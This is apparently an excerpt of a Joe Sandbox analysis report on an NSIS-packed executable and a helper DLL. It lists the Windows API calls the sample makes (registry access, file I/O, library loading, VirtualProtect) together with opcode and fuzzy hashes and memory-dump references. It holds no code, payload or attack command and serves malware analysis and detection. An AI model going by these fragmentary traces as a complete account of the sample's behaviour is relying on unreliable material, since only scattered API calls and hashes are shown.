                                                                                                                                                  • Opcode Fuzzy Hash: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                                                                  • Instruction Fuzzy Hash: AD714671E00228DBDF28CF98C854BADBBB1FF44305F15806AD816BB291C778AA56DF44
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                                                                                                                                                    • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                                    • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                                    • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                                    • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 334405425-0
                                                                                                                                                  • Opcode ID: ad4472eb048fd4f86da61da74e9e5b3811a19dd42f4402be3bbdcdbc4c44a188
                                                                                                                                                  • Instruction ID: 2e01ab74a4c934f7e6015694823d512690d69bb111ffb1ad89b514660c000c84
                                                                                                                                                  • Opcode Fuzzy Hash: ad4472eb048fd4f86da61da74e9e5b3811a19dd42f4402be3bbdcdbc4c44a188
                                                                                                                                                  • Instruction Fuzzy Hash: 65219871904215F6CF106F95CE48ADEBAB4AB04358F70417BF601B51E0D7B94D41DA6D
                                                                                                                                                  APIs
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00401B92
                                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BA4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Global$AllocFree
                                                                                                                                                  • String ID: Call
                                                                                                                                                  • API String ID: 3394109436-1824292864
                                                                                                                                                  • Opcode ID: c87ee951b69e9287724da4c2fa38da0a671d257472e11f53d94c14b3c1b0481d
                                                                                                                                                  • Instruction ID: 0d74e211bf3f77f63613a954a16e526c6d046d9130d490d95d437df5f5263094
                                                                                                                                                  • Opcode Fuzzy Hash: c87ee951b69e9287724da4c2fa38da0a671d257472e11f53d94c14b3c1b0481d
                                                                                                                                                  • Instruction Fuzzy Hash: 2F2196B2604501ABCB10EB94DE8599FB3A8EB44318B24053BF541B32D1D778AC019FAD
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,00000B80,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                                                                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402483
                                                                                                                                                  • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402496
                                                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nshD4CB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Enum$CloseOpenValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 167947723-0
                                                                                                                                                  • Opcode ID: 517814c6f651ee240b61b165206d5ac0b3e0be0642415c803f06eaab78b10a68
                                                                                                                                                  • Instruction ID: d1cba53e09d25e0e4976289683f2ac1bdc9fdbf0613ee45d63c2eeb4b4bf5101
                                                                                                                                                  • Opcode Fuzzy Hash: 517814c6f651ee240b61b165206d5ac0b3e0be0642415c803f06eaab78b10a68
                                                                                                                                                  • Instruction Fuzzy Hash: 8AF0D1B1A04204AFEB148FA5DE88EBF767CEF40358F10483EF001A21C0D2B85D41DB2A
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1630387930.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1630302750.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1630505484.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1630587983.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_10000000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFileLastRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1948546556-0
                                                                                                                                                  • Opcode ID: 56b0631d48e3d5b058df37f2c0bf37a0ba3bd5c787ddc121e10f68fdc3118472
                                                                                                                                                  • Instruction ID: 346bc7c3d20138bcfc700b2b1684b28c90b224d1e8b0175626a50a5a3d135241
                                                                                                                                                  • Opcode Fuzzy Hash: 56b0631d48e3d5b058df37f2c0bf37a0ba3bd5c787ddc121e10f68fdc3118472
                                                                                                                                                  • Instruction Fuzzy Hash: 0E51A2BA905215DFFB10DFA4DC8275937A8EB443D4F22C42AEA049721DCF34A991CB55
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,00000B80,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nshD4CB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3677997916-0
                                                                                                                                                  • Opcode ID: 46721b92d40d640d2f6aadb643be8dc990b493bf81be5550ca0503008034f64e
                                                                                                                                                  • Instruction ID: d36666ef43ed86f5efc63e353f879872970ea39244a0d469f35bb849977519d9
                                                                                                                                                  • Opcode Fuzzy Hash: 46721b92d40d640d2f6aadb643be8dc990b493bf81be5550ca0503008034f64e
                                                                                                                                                  • Instruction Fuzzy Hash: 3A117371915205EEDF14CFA0C6889AFB7B4EF40359F20843FE042A72D0D7B85A41DB5A
                                                                                                                                                  APIs
                                                                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                  • Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                                                                                                                  • Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
                                                                                                                                                  • Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                                                                                                                  • Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,00000B80,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004022FD
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseDeleteOpenValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 849931509-0
                                                                                                                                                  • Opcode ID: 816fb59d23b0977f6ef732cd369a029ecaf090c0f9f3f491ff21e0f5ffc01560
                                                                                                                                                  • Instruction ID: f65991dd8835b810368ef95f62892a142216c4200c100bb05ab411dbf566f3c1
                                                                                                                                                  • Opcode Fuzzy Hash: 816fb59d23b0977f6ef732cd369a029ecaf090c0f9f3f491ff21e0f5ffc01560
                                                                                                                                                  • Instruction Fuzzy Hash: D5F06272A04210ABEB15AFF59A4EBAE7278DB04318F20453BF201B71D1D5FC5D028A6D
                                                                                                                                                  APIs
                                                                                                                                                  • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\________.exe,80000000,00000003), ref: 00405B5A
                                                                                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$AttributesCreate
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 415043291-0
                                                                                                                                                  • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                                                                                  • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                                                                                                                  • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                                                                                  • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                                                                                                                  APIs
                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00405736,?,?,00000000,0040590C,?,?,?,?), ref: 00405B36
                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B4A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                  • Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                                                                                                                  • Instruction ID: 0892b5ef0b2723f07dcd522954823931705bd605f292322b3a664a2a0928558f
                                                                                                                                                  • Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                                                                                                                  • Instruction Fuzzy Hash: CDD0C972908020AFC2103728AE0C89BBB65DB543717018B31F965A22B0C7305C528AA6
                                                                                                                                                  APIs
                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: PrivateProfileStringWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 390214022-0
                                                                                                                                                  • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                                                                                  • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                                                                                                                                  • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                                                                                  • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                                                                                                                                  APIs
                                                                                                                                                  • RegOpenKeyExW.KERNELBASE(00000000,00000B80,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Open
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                                  • Opcode ID: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                                                                                                                  • Instruction ID: 83e72149abe1372da0a381261de05d436a54b8bdbe31dfced4d63089b9680d6c
                                                                                                                                                  • Opcode Fuzzy Hash: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                                                                                                                  • Instruction Fuzzy Hash: A0E04F7624010CBADB00DFA4ED46F9577ECEB14705F108425B608D6091C674E5008768
                                                                                                                                                  APIs
                                                                                                                                                  • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                  • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                                                                  • Instruction ID: e5271f86abd3e691175676240f3b6d2dabcfddd4658b863dc1b472273301a449
                                                                                                                                                  • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                                                                  • Instruction Fuzzy Hash: 8EE08632104259ABDF109E548C04EEB775CFB04350F044432F911E3140D231E820DBA4
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027AB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1630387930.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1630302750.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1630505484.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1630587983.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_10000000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                  • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                                  • Instruction ID: 267fa8ad402a2f1685f06aa6efb9df116a04c7e31b4918ac066fddfc95f4d9be
                                                                                                                                                  • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                                  • Instruction Fuzzy Hash: 5EF092F15097A0DEF350DF688C847063BE0E7483C4B03852AE368F6268EB344044CF19
                                                                                                                                                  APIs
                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
